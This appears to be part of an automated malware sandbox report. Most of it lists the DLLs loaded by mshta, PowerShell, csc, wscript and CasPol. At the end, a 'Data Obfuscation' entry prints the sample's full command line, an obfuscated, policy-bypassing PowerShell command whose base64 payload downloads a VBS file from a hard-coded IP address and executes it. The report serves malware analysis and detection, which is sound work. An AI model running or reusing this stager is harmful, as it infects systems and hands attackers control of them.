                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: iviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.pdb source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
